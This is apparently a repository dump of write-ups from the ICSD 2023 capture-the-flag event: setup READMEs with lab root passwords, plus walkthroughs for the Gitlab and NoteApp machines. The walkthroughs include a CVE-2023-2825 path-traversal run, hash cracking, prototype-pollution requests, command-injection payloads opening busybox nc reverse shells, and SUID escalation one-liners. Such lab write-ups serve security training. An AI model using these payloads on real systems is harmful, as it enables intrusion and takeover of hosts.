17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:1a@S3d$FZ
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Gitlab/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # Gitlab
2 |
3 | ## High Level Overview
4 |
5 | GitLab is a high-level Linux machine with several vulnerabilities that, when combined, grant us root access to the system. Upon checking the robots.txt file in the website, We find a list of password credentials in which these can be used to brute force the login page as a root user. From there, we discover a vulnerable GitLab Version 16.0.0 to Arbitrary File Read. After that we can view the /etc/passwd file in which it contains the hash of the plumber user. After brute forcing this hash via using `john` tool, we find the password and connect to this host via SSH. We make use of misconfigured pax to read the app.file in the root folder. Then we generate a specific CURL request to obtain an elevated shell.
6 |
7 | # Recon
8 |
9 | NMAP finds 2 open TCP port, SSH and HTTPS.
10 |
11 | 
12 |
13 | ## Site
14 |
15 | It appears that the website is utilizing Gitlab Enterprise Edition.
16 |
17 | 
18 |
19 | Let’s enumerate the hidden files and folders with `Gobuster`.
20 |
21 | 
22 |
23 | It seems there is a robots.txt file available in the website and probably contains password credential to log in.
24 |
25 | 
26 |
27 | The default user for GitLab Enterprise Edition is root.
28 |
29 | Let’s use BurpSuite to brute force the user.
30 |
31 | 
32 |
33 | We found the credentials for the root user in GitLab.
34 |
35 | When enumerating the GitLab Version that is available in the help menu.
36 |
37 | 
38 |
39 | GitLab 16.0.0 is vulnerable to Path Traversal and the associated CVE is CVE-2023-2825.
40 |
41 | The POC can be found here:
42 |
43 | [https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py](https://github.com/Occamsec/CVE-2023-2825/blob/main/poc.py)
44 |
45 | Let’s change username, password and the endpoint inside this script before executing this script.
46 |
47 | ```jsx
48 | ENDPOINT = "https://gitlab.icsd"
49 | USERNAME = "root"
50 | PASSWORD = "Shadow123123"
51 | ```
52 |
53 | The result of the python script:
54 |
55 | ```jsx
56 | ─# python3 poc.py
57 | [*] Attempting to login...
58 | [*] Login successful as user 'root'
59 | [*] Creating 11 groups with prefix 469
60 | [*] Created group '469-1'
61 | [*] Created group '469-2'
62 | [*] Created group '469-3'
63 | [*] Created group '469-4'
64 | [*] Created group '469-5'
65 | [*] Created group '469-6'
66 | [*] Created group '469-7'
67 | [*] Created group '469-8'
68 | [*] Created group '469-9'
69 | [*] Created group '469-10'
70 | [*] Created group '469-11'
71 | [*] Created public repo '/469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825'
72 | [*] Uploaded file '/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f/file'
73 | [*] Executing exploit, fetching file '/etc/passwd': GET - //469-1/469-2/469-3/469-4/469-5/469-6/469-7/469-8/469-9/469-10/469-11/CVE-2023-2825/uploads/2a9cdef69c9b1db6ce7fc909a96cb11f//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
74 |
75 | root:x:0:0:root:/root:/bin/bash
76 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
77 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
78 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
79 | sync:x:4:65534:sync:/bin:/bin/sync
80 | games:x:5:60:games:/usr/games:/usr/sbin/nologin
81 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
82 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
83 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
84 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
85 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
86 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
87 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
88 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
89 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
90 | irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
91 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
92 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
93 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
94 | systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
95 | systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
96 | messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
97 | systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
98 | pollinate:x:105:1::/var/cache/pollinate:/bin/false
99 | sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
100 | syslog:x:107:113::/home/syslog:/usr/sbin/nologin
101 | uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
102 | tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
103 | tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
104 | landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
105 | fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
106 | usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
107 | plumber:$y$j9T$Q60srmF7j7UmqQhxTU2/p.$x2mfeh7AqyZr2sAcIT9LTXTEhVIbJ3Oians4wDJdin/:1000:1000:plumber:/home/plumber:/bin/bash
108 | lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
109 | gitlab-www:x:998:999::/var/opt/gitlab/nginx:/bin/false
110 | git:x:997:998::/var/opt/gitlab:/bin/sh
111 | gitlab-redis:x:996:997::/var/opt/gitlab/redis:/bin/false
112 | gitlab-psql:x:995:996::/var/opt/gitlab/postgresql:/bin/sh
113 | registry:x:994:995::/var/opt/gitlab/registry:/bin/sh
114 | ```
115 |
116 | It seems the hash of the plumber user is available in the `/etc/passwd` file. Let’s brute force this with the following `john` command.
117 |
118 | ```jsx
119 | john --format=crypt hash.txt
120 | ```
121 |
122 | 
123 |
124 | Using this credentials, we can SSH into the “plumber” user.
125 |
126 | 
127 |
128 | Let’s look at the Listening Ports via using the following command.
129 |
130 | ```jsx
131 | netstat -tulnp
132 | ```
133 |
134 | 
135 |
136 | Let’s send a CURL request.
137 |
138 | ```jsx
139 | plumber@plumber:~$ curl 127.0.0.1:10080
140 | Cannot resolve GET request
141 | plumber@plumber:~$
142 | ```
143 |
144 | Let’s change the HTTP Method (POST) for this.
145 |
146 | ```jsx
147 | plumber@plumber:~$ curl -XPOST 127.0.0.1:10080
148 |
149 |
150 |
151 | TypeError: expected str, bytes or os.PathLike object, not NoneType
152 | .....
153 | SHORTENED
154 | .....
155 | <div class="plain">
156 | <p>
157 | This is the Copy/Paste friendly version of the traceback.
158 | </p>
159 | <textarea cols="50" rows="10" name="code" readonly>Traceback (most recent call last):
160 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__
161 | return self.wsgi_app(environ, start_response)
162 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app
163 | response = self.handle_exception(e)
164 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app
165 | response = self.full_dispatch_request()
166 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request
167 | rv = self.handle_user_exception(e)
168 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request
169 | rv = self.dispatch_request()
170 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request
171 | return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
172 | File "/root/webapp/app.py", line 13, in index
173 | print("User Input:", os.system(user_input))
174 | TypeError: expected str, bytes or os.PathLike object, not NoneType
175 | </textarea>
176 | </div>
177 | <div class="explanation">
178 | The debugger caught an exception in your WSGI application. You can now
179 | look at the traceback which led to the error. <span class="nojavascript">
180 | If you enable JavaScript you can also use additional features such as code
181 | execution (if the evalex feature is enabled), automatic pasting of the
182 | exceptions and much more.</span>
183 | </div>
184 | <div class="footer">
185 | Brought to you by <strong class="arthur">DON'T PANIC</strong>, your
186 | friendly Werkzeug powered traceback interpreter.
187 | </div>
188 | </div>
189 |
190 | <div class="pin-prompt">
191 | <div class="inner">
192 | <h3>Console Locked</h3>
193 | <p>
194 | The console is locked and needs to be unlocked by entering the PIN.
195 | You can find the PIN printed out on the standard output of your
196 | shell that runs the server.
197 | <form>
198 | <p>PIN:
199 | <input type=text name=pin size=14>
200 | <input type=submit name=btn value="Confirm Pin">
201 | </form>
202 | </div>
203 | </div>
204 | </body>
205 | </html>
206 |
207 | <!--
208 |
209 | Traceback (most recent call last):
210 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2213, in __call__
211 | return self.wsgi_app(environ, start_response)
212 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2193, in wsgi_app
213 | response = self.handle_exception(e)
214 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 2190, in wsgi_app
215 | response = self.full_dispatch_request()
216 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1486, in full_dispatch_request
217 | rv = self.handle_user_exception(e)
218 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1484, in full_dispatch_request
219 | rv = self.dispatch_request()
220 | File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1469, in dispatch_request
221 | return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
222 | File "/root/webapp/app.py", line 13, in index
223 | print("User Input:", os.system(user_input))
224 | TypeError: expected str, bytes or os.PathLike object, not NoneType
225 |
226 | -->
227 | plumber@plumber:~$
228 | ```
229 |
230 | There is a file in ‘/root/webapp/app.py’ which is hosting this simple HTTP service. However, we cannot have access to /root folder.
231 |
232 | Enumeration is the key.
233 |
234 | When searching for the SUID files, we found that `pax` command has SUID permission and we can abuse this to read the content of the file.
235 |
236 | ```jsx
237 | LFILE=file_to_read
238 | pax -w "$LFILE"
239 | ```
240 |
241 | We can view the content of this file through changing the above command.
242 |
243 | ```jsx
244 | plumber@plumber:~$ LFILE="/root/webapp/app.py"
245 | pax -w "$LFILE"
246 | /root/webapp/app.py010064400000000000000000000011111450271307700132670ustar00rootrootfrom flask import Flask, request, render_template
247 | import os
248 |
249 | app = Flask(__name__)
250 |
251 | # Define the route for the home page
252 | @app.route('/', methods=['GET','POST'])
253 | def index():
254 | if request.method == 'POST':
255 | # Get the user input from the form
256 | user_input = request.form.get('user_input')
257 | # Print the user input to the console
258 | print("User Input:", os.system(user_input))
259 | elif request.method == 'GET':
260 | return "Cannot resolve GET request"
261 |
262 | # return render_template('index.html')
263 |
264 | if __name__ == '__main__':
265 | app.run(debug=True, port=10080)
266 | plumber@plumber:~$
267 | ```
268 |
269 | The following command can be used to get a reverse shell.
270 |
271 | ```jsx
272 | plumber@plumber:~$ curl -XPOST localhost:10080 -d "user_input=busybox nc 192.168.47.128 12342 -e sh"
273 | ```
274 |
275 | 
276 |
277 | Thank you for Reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find IP address of the machine using arp-scan in your kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:Zold3kMnsn@M1n3
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/NoteApp/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/NoteApp/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # NoteApp
2 |
3 | ## High Level Overview
4 |
5 | NoteApp is a high-level Linux machine with several vulnerabilities that, when combined, grant us root access to the system. Upon analyzing the source code of the application, We find an interesting functionality in GenerateNoteUrl() function which is a regex checking vulnerability of .replace() method and exploit it to gain access to unreachable hidden internal endpoints. From there, we discover a vulnerable /api/admin/create-admin-user endpoint being vulnerable to Prototype Pollution. After that we create a user with admin privileges and exploit an RCE in /api/admin/delete-profile-photo by simply applying our reverse shell command. After getting a reverse shell as a normal user in the system, we find that rsync is set as SUID bit. We make use of SUID command for this command in GTFOBins and obtain an elevated shell.
6 |
7 | # Recon
8 |
9 | NMAP finds 1 open TCP port, HTTP port 8080.
10 |
11 | 
12 |
13 | ## Site
14 |
15 | This site reveals its GitHub source code link in ‘/’ endpoint.
16 |
17 | 
18 |
19 | 
20 |
21 | Through analyzing the source code of the web application, we come across with 2 main services being called ‘Gateway’ and ‘Internal’ in turn.
22 |
23 | The default port for the ‘Internal’ service is only available through local meaning that this is blocked by the local firewall for direct communication.
24 |
25 | ## GitHub Endpoints
26 |
27 | ### /sign-in and /sign-up
28 |
29 | 
30 |
31 | As its name suggests, the ‘Gateway’ service is acting like a gateway between ‘Internal’ service and the NoteApp User.
32 |
33 | It seems we are able to register and log in to send requests to these endpoints below.
34 |
35 | 
36 |
37 | ### Sign-Up request in BurpSuite
38 |
39 | ```bash
40 | POST /sign-up HTTP/1.1
41 | Host: noteapp.icsd:8080
42 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
43 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
44 | Accept-Language: en-US,en;q=0.5
45 | Accept-Encoding: gzip, deflate
46 | Connection: close
47 | Upgrade-Insecure-Requests: 1
48 | Content-Type: application/json
49 | Content-Length: 95
50 |
51 | {"email": "huseyn.aghazada@prosol.az","username":"huseyna12","password":"hehehe12","age": 12
52 | }
53 | ```
54 |
55 | 
56 |
57 | ### Sign-In request in BurpSuite
58 |
59 | ```bash
60 | POST /sign-in HTTP/1.1
61 | Host: noteapp.icsd:8080
62 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
63 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
64 | Accept-Language: en-US,en;q=0.5
65 | Accept-Encoding: gzip, deflate
66 | Connection: close
67 | Upgrade-Insecure-Requests: 1
68 | Content-Type: application/json
69 | Content-Length: 62
70 |
71 | {"email": "huseyn.aghazada@prosol.az","password":"hehehe12"
72 | }
73 | ```
74 |
75 | 
76 |
77 | ### GenerateNoteUrl
78 |
79 | This URL Generator function directly uses `.replace()` method of JavaScript.
80 |
81 | 
82 |
83 | When we search for `.replace()` method of JS, it can be seen that this method is taking arguments of `RegExp` object along with strings.
84 |
85 | 
86 |
87 | Let’s put these things together.
88 |
89 | ```jsx
90 | const noteUrl = `${base_url}method-user-note/:NoteId:/`;
91 |
92 | const GenerateNoteUrl = (method, NoteId) => {
93 | return noteUrl.replace('method', method).replace(':NoteId:', NoteId);
94 | };
95 | ```
96 |
97 | `method` variable in the first `replace()` method cannot directly be abused by the attacker, however, the second `NoteId` is a user input. Therefore, let’s look at the second `.replace()` method.
98 |
99 | As can be seen from this [website](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace), Adding `$’` to the NoteId input, it will cause for the `.replace()` method to add the portion of the string (`/`) that follows the matched substring (`:NoteId:`).
100 |
101 | For simplicity, I used the following node script.
102 |
103 | ```jsx
104 | const noteUrl = 'http://localhost/:8080/get-user-note/:NoteId:/'
105 | USERINPUT = `huseyn$'aghazada`
106 | noteUrl.replace(':NoteId:', USERINPUT);
107 | ```
108 |
109 | 
110 |
111 | This means that we can send direct requests to hidden `Internal` service endpoints such as `/first_flag` endpoint that I have added.
112 |
113 | 
114 |
115 | 
116 |
117 | After successfully retrieving the first flag, we can go for the second flag.
118 |
119 | Also from the image above in ./internal/app.js file, you can see that with _method=METHOD query, it is possible to override the HTTP method that is sent to the Internal service.
120 |
121 | This is for checking:
122 |
123 | 
124 |
125 | We can successfully override the method with *_method* query.
126 |
127 | ### Prototype Pollution
128 |
129 | From the code in `AdminController.js`, we can create an admin user via exploiting prototype pollution.
130 |
131 | ```jsx
132 | exports.CreateAdminUser = (req, res) => {
133 | const errors = validationResult(req);
134 | if (!errors.isEmpty()) {
135 | return res.status(400).json({ errors: errors.array() });
136 | }
137 | const user = req.body;
138 |
139 | if (user.isAdmin && user.SecretCode !== SecretCode) {
140 | return res.status(401).json({ message: 'No Admin User is created!!!' });
141 | }
142 | else {
143 | let NewUser = Object.assign(DefaultUser, user);
144 | if (NewUser.isAdmin) {
145 | bcrypt.hash(NewUser.password, 10, (err, hashedPassword) => {
146 | if (err) {
147 | return res.status(500).json({ message: 'Error hashing password' });
148 | }
149 |
150 | AdminUser.findByUsername(NewUser.username, (existingAdminUserByUsername) => {
151 | if (existingAdminUserByUsername) {
152 | return res.status(400).json({ message: 'Username is already taken' });
153 | }
154 | AdminUser.create(NewUser.username, hashedPassword, (adminId) => {
155 | return res.status(201).json({ message: 'Admin User is successfully created', adminId });
156 | });
157 | });
158 | });
159 | }
160 | else {
161 | return res.status(401).json({ message: 'No Admin User is created!!!' });
162 | }
163 | }
164 | };
165 | ```
166 |
167 | In javascript, the arguments in `Object.assign()` is given in wrong order and also there is no any checking via assign the variable `user` into `req.body`.
168 |
169 | ```jsx
170 | PUT /update-user-note/..$'..$'admin$'create-admin-user%3F_method=POSt& HTTP/1.1
171 | Host: noteapp.icsd:8080
172 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
173 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
174 | Accept-Language: en-US,en;q=0.5
175 | Accept-Encoding: gzip, deflate
176 | Connection: close
177 | Upgrade-Insecure-Requests: 1
178 | Content-Type: application/json
179 | Content-Length: 86
180 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
181 |
182 | {
183 | "username": "admin",
184 | "password":"adminadmin",
185 | "__proto__": { "isAdmin":true
186 | }
187 | }
188 | ```
189 |
190 | 
191 |
192 | Let’s login as newly created admin user.
193 |
194 | ```jsx
195 | PUT /update-user-note/..$'..$'admin$'login-as-admin%3F_method=POST& HTTP/1.1
196 | Host: noteapp.icsd:8080
197 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
198 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
199 | Accept-Language: en-US,en;q=0.5
200 | Accept-Encoding: gzip, deflate
201 | Connection: close
202 | Upgrade-Insecure-Requests: 1
203 | Content-Type: application/json
204 | Content-Length: 49
205 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
206 |
207 | {
208 | "username": "admin",
209 | "password":"adminadmin"}
210 | ```
211 |
212 | 
213 |
214 | Now, we are an admin user. Last thing is to abuse the endpoints that are accessible by admin user.
215 |
216 | 
217 |
218 | It seems we can exploit this by simply sending semicolon and execute our listener command.
219 |
220 | ```jsx
221 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
222 | Host: noteapp.icsd:8080
223 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
224 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
225 | Accept-Language: en-US,en;q=0.5
226 | Accept-Encoding: gzip, deflate
227 | Connection: close
228 | Upgrade-Insecure-Requests: 1
229 | Content-Type: application/json
230 | Content-Length: 43
231 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
232 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs
233 |
234 | {
235 | "fileName": "random_file.jpg; whoami"
236 | }
237 | ```
238 |
239 | 
240 |
241 | Using `busybox` instead of direct `nc` command seems more opsec for me.
242 |
243 | ```jsx
244 | PUT /update-user-note/..$'..$'admin$'delete-profile-photo%3F_method=POST& HTTP/1.1
245 | Host: noteapp.icsd:8080
246 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
247 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
248 | Accept-Language: en-US,en;q=0.5
249 | Accept-Encoding: gzip, deflate
250 | Connection: close
251 | Upgrade-Insecure-Requests: 1
252 | Content-Type: application/json
253 | Content-Length: 79
254 | Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI1ZWI5M2I5OS02NzJhLTQ1ZGItYTBhNS1mYjk0OTJlNWRjNTUiLCJpYXQiOjE2OTYyNzMwNzQsImV4cCI6MTY5NjI3NDg3NH0.a2Gk3S4ppWkiOJk9lIwGjqLyBPaPtdv_S0L0sKINTSo
255 | X-Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbklkIjoiY2M3MWU5N2UtNWE3MC00MDQ0LThjMjUtYzFkODczNzM4NzMzIiwiaWF0IjoxNjk2Mjc1NzE2LCJleHAiOjE2OTYyNzkzMTZ9.pdR7ok7Xn-cU3YDZVperWvFTD9TNR789abKJ3QsmtBs
256 |
257 | {
258 | "fileName": "random_file.jpg; busybox nc 192.168.100.248 53 -e /bin/bash"
259 | }
260 | ```
261 |
262 | 
263 |
264 | ## Privilege Escalation
265 |
266 | After successfully getting reverse shell, we can go for the privilege escalation.
267 |
268 | ```jsx
269 | find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
270 | ```
271 |
272 | 
273 |
274 | It seems `rsync` command has SUID permission, so lets search this in **[GTFOBins](https://gtfobins.github.io/)**. This command is enough to get elevated shell.
275 |
276 | ```jsx
277 | rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
278 | ```
279 |
280 | 
281 |
282 | Thank you for Reading!!
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/README.md:
--------------------------------------------------------------------------------
1 | Machine images can be installed from [this link](https://drive.google.com/drive/folders/1mJG_11NPdRdBOJevI7wx_VfH41mm01RS?usp=sharing).
2 |
--------------------------------------------------------------------------------
/Game Of Thrones/README.md:
--------------------------------------------------------------------------------
1 | # 'Game of Thrones' - Capture the Flag
2 |
3 | As PROSOL, we had the opportunity to host the ICSD 2023 conference - an event dedicated to cybersecurity days for the third time! The event was co-hosted by PROSOL and the State Service for Special Communication and Information Security.
4 |
5 | Within the framework of the event, which took place on September 21-23, 2023, a CTF competition in the format of "Game of Thrones" was organized by the hosts. According to the event schedule, the competition took place on September 22 and lasted for 6 hours. Ten teams, each consisting of three members, competed for a prize pool totaling 3000AZN and additional exciting prizes.
6 |
7 | CyberYashma emerged as the winner of the competition, scoring 220 out of 600 possible points. The second and third place teams (DoublePulsar and ALLSAFE) both achieved a score of 110.
8 |
9 | In this repository, we will share all the materials that we used during the CTF to express our appreciation for open source. Moreover, to support this idea, we have used one easy machine from [vulnhub](https://www.vulnhub.com/entry/election-1,503/) (Callobes)!
10 |
11 | # General Information
12 | 6 vulnerable machines were presented to competitors. Machines were categorized as easy, medium, and hard. Each easy machine provided 50 points, each medium machine 100 points, and each hard machine 150 points, adding up to a total of 600 points. Moreover, competitors were able to access an ELK server where all HTTP logs, as well as each command run on attack boxes, were logged (to read more, please refer to [architecture section](https://github.com/icsd-ctf/ICSD/tree/master/Game%20Of%20Thrones/Architecture/Writeup.md)). This, in theory, should have helped teams find the exact ways other teams exploited the machines and redo the steps to obtain the flags. This way, teams with better overall offensive and defensive skills would come out on top.
13 |
14 | > [!NOTE]
15 | > In addition to the primary challenges, we introduced a secondary challenge: competitors were given the option to destroy the machines (for example delete important system files, block network access etc.) they had successfully exploited. However, there were consequences for this action.
16 | > If other teams detected the destruction of a machine, they would be rewarded with an additional 50 points. On the other hand, the team that destroyed the machine would face a penalty of 20 points and a ban from accessing that specific machine.
17 | > During the CTF, a couple of such incidents occurred where teams did damage the CTF machines. However, none were detected.
18 |
19 |
20 | # Standings
21 |
22 | | Teams/Machines | Callobes | Gitlab | Bytescribe | Captivity | Blitz | Noteapp | Total |
23 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: |
